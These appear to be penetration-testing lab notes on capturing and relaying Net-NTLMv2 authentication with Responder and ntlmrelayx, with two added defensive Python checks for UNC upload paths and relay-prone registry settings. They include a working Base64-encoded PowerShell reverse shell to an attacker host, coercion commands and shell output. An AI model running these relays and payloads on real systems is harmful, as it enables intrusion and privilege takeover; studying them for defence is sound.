If we gain access as an unprivileged user and cannot use tools like , we can abuse the Net-NTLMv2 network authentication protocol, which handles the authentication process between Windows clients and servers over a network.
Net-NTLMv2 is present in almost all Windows environments for compatibility purposes and it is less secure than the more modern Kerberos protocol.
SMB Authentication
Direct SMB Auth
We send the server a request outlining the connection details for the SMB share we want to access.
The server then sends us a challenge; we use our NTLM hash to compute a response to that challenge, which proves we know the hash without ever transmitting it.
The server checks our challenge response and grants or denies access accordingly.
We can capture this exchange with Responder: it runs a rogue SMB server on the attacking machine, and we make the target connect to it, as shown below:
# achieving RCE as a non-privileged user
$ nc 192.168.235.211 4444
Microsoft Windows [Version 10.0.20348.707]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
files01\paul
C:\Windows\system32>net user paul
net user paul
User name paul
Full Name paul power
<SNIP>
Local Group Memberships *Remote Desktop Users *Users
# launching the SMB server on the attacking machine
$ sudo responder -I tun0
# connecting to a non-existent share to force authentication
C:\Windows\system32>dir \\192.168.45.186\test
dir \\192.168.45.186\test
Access is denied.
If we haven't achieved RCE, we can look for a file upload form in a web application running on a Windows server and submit a non-existent file via a UNC path such as \\<attacker-IP>\share\nonexistent.txt. If the web app supports SMB uploads, the Windows server will authenticate to our SMB server.
How a UNC path survives a web request depends on the language the application is written in. Most languages treat \ as an escape character in strings, so each backslash must be doubled for it to be read literally: \\\\server\\share.
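From the defender's side, the point above is that an upload handler should never pass a user-supplied name containing a UNC prefix (in either its raw or its escaped, doubled-backslash spelling) to the filesystem. The following is an added Python example, not code from the original notes; the function names and the sample inputs are my own constructions.

```python
"""Reject UNC, absolute and traversal paths in upload file names (added example)."""
import re
from typing import Optional

# Two or more leading separators of either kind matches \\server\share,
# //server/share, \\?\UNC\server\share and the escaped spelling
# \\\\server\\share that arrives when a JSON/string literal was not un-escaped.
_UNC_PREFIX = re.compile(r"^[\\/]{2,}")
_DRIVE = re.compile(r"^[A-Za-z]:")
_SEPARATORS = re.compile(r"[\\/]+")

# Constructed sample inputs resembling what an upload form could receive.
SAMPLE_NAMES = [
    "report.pdf",
    r"\\192.0.2.10\share\nonexistent.txt",
    "\\\\\\\\192.0.2.10\\\\share\\\\nonexistent.txt",  # doubled backslashes
    "//192.0.2.10/share/nonexistent.txt",
    r"\\?\UNC\192.0.2.10\share\file.txt",
    "..\\..\\windows\\win.ini",
    "C:\\temp\\x.txt",
]


def classify_upload_name(name: str) -> str:
    """Classify a user-supplied file name.

    Returns one of 'ok', 'empty', 'unc', 'absolute' or 'traversal'.
    """
    if not name or "\x00" in name:
        return "empty"
    if _UNC_PREFIX.match(name):
        return "unc"
    if _DRIVE.match(name) or name[0] in "\\/":
        return "absolute"
    # Collapse doubled backslashes before splitting so that an escaped
    # ..\\..\\ is recognised the same way as ..\..\.
    parts = _SEPARATORS.split(name.replace("\\\\", "\\"))
    if any(part == ".." for part in parts):
        return "traversal"
    return "ok"


def safe_upload_name(name: str) -> Optional[str]:
    """Return a separator-free base name, or None if the input must be rejected.

    Only the last path component is kept, and characters outside a small
    whitelist are replaced, so the result can never point outside the
    upload directory or at a remote share.
    """
    if classify_upload_name(name) != "ok":
        return None
    base = _SEPARATORS.split(name)[-1]
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base).strip("._")
    return base or None


if __name__ == "__main__":
    for sample in SAMPLE_NAMES:
        print(f"{classify_upload_name(sample):9s} {safe_upload_name(sample)!r:22} {sample}")
```

The classification happens before any normalisation by the runtime, which matters because a library call such as `os.path.join` on Windows happily accepts a UNC root and would trigger the outbound SMB authentication the notes describe.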
NTLMv2 Relay
We have achieved RCE as files02admin on FILES01. Based on the name, we hypothesize that this account is a local admin on FILES02. We have captured this user's NTLMv2 hash, but it cannot be cracked.
In this example we don't use the local Administrator user for the relay attack as we did for the PtH attack. Therefore, the target system needs to have UAC remote restrictions disabled, or the command execution will fail. If UAC remote restrictions are enabled on the target, only the local Administrator user can be used for the relay attack.
Our goal now is to start an SMB server on the attacking machine with the impacket-ntlmrelayx script and instruct it to relay the incoming NTLMv2 authentication to our target machine (FILES02), executing the command passed with -c, in this case the reverse shell payload. We can use CyberChef to Base64-encode the reverse shell payload.
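The relay above succeeds because FILES02 does not require SMB signing (so the relayed session is accepted as-is) and, per the UAC note, has remote restrictions disabled for its local admins. The following added Python example, not part of the original notes, audits exactly those settings from the text output of `reg query` on a Windows host; the sample output is constructed with made-up values, and the function names are my own.

```python
"""Audit NTLM relay exposure from pasted `reg query` output (added example)."""
import re
from typing import Dict, List, Tuple

# Constructed sample output, in the format printed by
#   reg query <key> /v <value>
# on a Windows host. The values here are invented, not taken from the notes.
REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
    RequireSecuritySignature    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    LmCompatibilityLevel    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    LocalAccountTokenFilterPolicy    REG_DWORD    0x1
"""

# One indented "<name>  REG_<type>  <data>" line of reg query output.
_VALUE_LINE = re.compile(
    r"^\s+(\S+)\s+REG_(?:DWORD|QWORD|SZ|EXPAND_SZ|MULTI_SZ)\s+(.*?)\s*$",
    re.MULTILINE,
)

Finding = Tuple[str, str, str]  # (value name, severity, explanation)


def parse_reg_output(text: str) -> Dict[str, str]:
    """Map each value name in reg query output to its raw data string."""
    return {m.group(1): m.group(2) for m in _VALUE_LINE.finditer(text)}


def audit_relay_exposure(values: Dict[str, str]) -> List[Finding]:
    """Report settings that let an NTLM relay against this host's SMB service work."""
    findings: List[Finding] = []

    # SMB signing: when the server does not require it, a relayed session is
    # accepted even though the relay never learns the session key.
    if int(values.get("RequireSecuritySignature", "0x0"), 16) != 1:
        findings.append((
            "RequireSecuritySignature", "high",
            "SMB signing is not required; relayed NTLM authentication is accepted",
        ))

    # LmCompatibilityLevel: 0-2 may still send LM/NTLMv1 responses, 3-4 send
    # NTLMv2 only but still accept LM/NTLMv1 from clients, 5 refuses them.
    level = int(values.get("LmCompatibilityLevel", "0x0"), 16)
    if level < 3:
        findings.append((
            "LmCompatibilityLevel", "high",
            f"level {level}: host may send LM/NTLMv1 responses, which are far easier to crack",
        ))
    elif level < 5:
        findings.append((
            "LmCompatibilityLevel", "low",
            f"level {level}: host sends NTLMv2 but still accepts LM/NTLMv1 from clients",
        ))

    # LocalAccountTokenFilterPolicy = 1 disables UAC remote restrictions, so any
    # local admin (not only Administrator) gets a full token over the network.
    if int(values.get("LocalAccountTokenFilterPolicy", "0x0"), 16) == 1:
        findings.append((
            "LocalAccountTokenFilterPolicy", "medium",
            "UAC remote restrictions disabled: every local admin can be relayed to a full token",
        ))
    return findings


if __name__ == "__main__":
    for name, severity, message in audit_relay_exposure(parse_reg_output(REG_OUTPUT)):
        print(f"[{severity:6s}] {name}: {message}")
```

A host with RequireSecuritySignature=1, LmCompatibilityLevel=5 and LocalAccountTokenFilterPolicy absent or 0 produces no findings; the relay shown in this section would then fail at the authentication step regardless of which account was coerced.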
# relay the payload to the FILES02 machine
$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.235.212 -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADQANQAuADEAOAA2ACcALAA4ADAAOAAwACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAiAC4AIAB7ACAAJABkAGEAdABhACAAfQAgADIAPgAmADEAIgAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACAAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
# start a listener on the attacking machine
$ nc -nvlp 8080
# RCE on the FILES01 machine
$ nc 192.168.235.211 5555
Microsoft Windows [Version 10.0.20348.707]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
files01\files02admin
# connect to a non-existent share to force authentication
C:\Windows\system32>dir \\192.168.45.186\test
dir \\192.168.45.186\test
The network name cannot be found.
$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.235.212 -c "powershell -enc JABjAGwAa<SNIP>=="
<SNIP>
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.235.211, attacking target smb://192.168.235.212
[*] Authenticating against smb://192.168.235.212 as FILES01/FILES02ADMIN SUCCEED
[*] All targets processed!
# RCE on FILES02
$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [192.168.45.186] from (UNKNOWN) [192.168.235.212] 65367
PS C:\users\files02admin\desktop> whoami
nt authority\system